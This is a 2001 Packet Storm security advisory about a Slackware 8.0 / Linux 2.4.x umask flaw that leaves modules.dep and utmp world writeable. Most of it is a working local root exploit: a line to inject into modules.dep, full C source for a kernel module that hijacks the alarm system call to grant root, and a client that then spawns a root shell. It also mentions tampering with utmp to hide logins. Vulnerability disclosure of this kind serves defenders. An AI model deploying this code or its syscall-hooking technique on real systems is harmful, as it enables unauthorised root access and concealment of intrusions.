slackware.init.txt

2001-07-18T00:00:00
ID PACKETSTORM:25013
Type packetstorm
Reporter Josh
Modified 2001-07-18T00:00:00

Description

                                        
                                            `I posted this to the linux kernel mailing last Friday, July 13th 2001:  
  
Submitted by : Josh (josh@pulltheplug.com), lockdown  
(lockdown@lockeddown.net) on July 16th, 2001  
Vulnerability : /lib/modules/2.4.5/modules.dep  
Tested On : Slackware 8.0. 2.4.5  
Local : Yes  
Remote : No  
Temporary Fix : umask 022 at the top of all your startup scripts  
Target : root  
Big thanks to : slider, lamagra, zen-parse  
Greets to : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it,  
cryptix, s0ttle, xphantom, qtip, tirancy, Loki,  
falcon-networks.com.  
  
The 2.4.x kernels starting with 2.4.3 (i think) have, after  
load, left a umask of 0000. This forces any files created in the bootup  
scripts, without the command `umask 022` issued to be world writeable.  
In slackware, files include /var/run/utmp and /var/run/gpm.pid. This same  
vulnerability is responsible for creating /lib/modules/`uname -r`/modules.dep  
world writeable. With this file world writeable, all an intruder need do is  
put something like the following in /lib/modules/`uname -r`/modules.dep  
assuming the system's startup scripts modprobe lp:  
  
/lib/modules/2.4.5/kernel/drivers/char/lp.o: /tmp/alarm.o  
  
/tmp/alarm.o:  
  
where the alarm.o module is:  
  
#include <linux/config.h>  
#include <linux/module.h>  
#include <linux/version.h>  
#include <linux/types.h>  
#include <asm/segment.h>  
#include <asm/unistd.h>  
#include <linux/dirent.h>  
#include <sys/syscall.h>  
#include <sys/sysmacros.h>  
  
#include <linux/sched.h>  
  
#include <linux/errno.h>  
#include <linux/fs.h>  
#include <linux/kernel.h>  
  
extern void* sys_call_table[];  
  
unsigned int (*old_alarm) (unsigned int seconds);  
unsigned int hacked_alarm (unsigned int seconds);  
  
unsigned int hacked_alarm(unsigned int seconds)  
{  
if(seconds == 454) {  
current->uid = 0;  
current->euid = 0;  
current->gid = 0;  
current->egid = 0;  
return 0;  
}  
return old_alarm(seconds);  
}  
  
int init_module(void) {  
old_alarm=sys_call_table[SYS_alarm];  
sys_call_table[SYS_alarm] = hacked_alarm;  
return 0;  
}  
  
void cleanup_module(void) {  
sys_call_table[SYS_alarm] = old_alarm;  
}  
  
make a client:  
#include <stdio.h>  
#include <unistd.h>  
  
int main(void)  
{  
alarm(454);  
execl("/bin/sh", "sh", NULL);  
}  
  
which will, when the module is loaded, execute a shell as root.  
  
  
And of course with /var/run/utmp writeable, users can delete or in  
other ways manipulate their logins as they appear in  
w/who/finger/getlogin(), etc.  
`